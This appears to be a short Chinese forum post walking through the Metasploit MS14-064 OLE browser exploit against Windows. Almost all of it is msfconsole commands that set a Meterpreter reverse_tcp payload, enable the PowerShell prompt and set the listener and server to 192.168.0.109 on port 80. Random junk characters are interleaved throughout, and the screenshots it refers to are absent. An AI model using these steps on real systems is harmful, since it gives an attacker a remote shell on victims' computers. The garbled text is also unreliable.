, \; H5 u9 G; D- F& U# P
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示. A4 o( \ E' j" t' i
/ b; f( x' _* Q
& _2 g; z, {# M0 V0 X
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
& i9 P5 U1 j( t- i3 F' `( f
4 [- ^9 i4 x1 J, I) c
; p& D1 H' i: O& \0 c# t 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
# N! D6 x' G! a2 b5 p' {/ f
/ H+ ]! s+ ^* _: H
' d$ N+ p* x5 _ set AllowPowershellPrompt true7 R: ~7 @! D- R$ b; p
/ T) n/ d. R# i+ [/ x4 k
' d2 m, J* ]: U3 G
Set LHOST 192.168.0.109. z, A- n- p9 a _/ ^
2 [( B {" N' I! ]/ m) A+ V0 b, f! I5 b f) K
set SRVHOST 192.168.0.109" O# H& e1 @$ `8 Z! U/ g
4 s9 ]1 A E: K0 s/ x$ b* C
+ m" R2 {8 ~; @# F4 B Set uripath share7 ]3 `, h0 ?- w& v
$ r2 J+ Q6 s: ]+ L8 t& T
. Z: ], E) r5 V% @; `% K- T Set srvport 80
4 S+ i) u' j4 T) t; W. s5 P. p2 d
/ S$ m0 t2 j" R4 X
' a# k" Z. g9 Y: ?6 ^( v
! @' A! `. Z/ ~, f" @
4 m2 K( r! w7 b- L( C f# |
& b _8 j k- P6 M7 q' m. q
) Z! S' L( x: D5 x% j
/ H$ I3 k- D3 b: h
% U7 D8 C- a# X$ y8 i 0 ?! Y0 v5 ~9 O$ I
0 j1 |: p2 V1 {) d8 T% w
' M1 x/ _7 P" ~+ u; q 5 D# l! M c- K/ J
, Z L( H0 x9 d( X! W2 X8 M- x% ^$ s& w, ^ `
1 B) i% e$ X) S
2 q) l ], H$ p' b0 O4 [3 u0 X$ A; q4 L- r
下面我们来访问本地地址如图:
5 V6 j, k1 ^3 w6 n' k# J9 G
9 C/ ~: E( S* ?4 t
4 f r# O) C6 k: G
V& t2 `# z" Y2 Z# E
) d8 {) N9 q( e3 z- k
; e& s. U9 y. b- U' h
# z8 }' z. C3 i! F/ J" P* |
# e/ a8 L4 A5 @' x9 S7 d% p$ N0 }8 K
( y; p' l0 E* n9 c) ~: ]2 d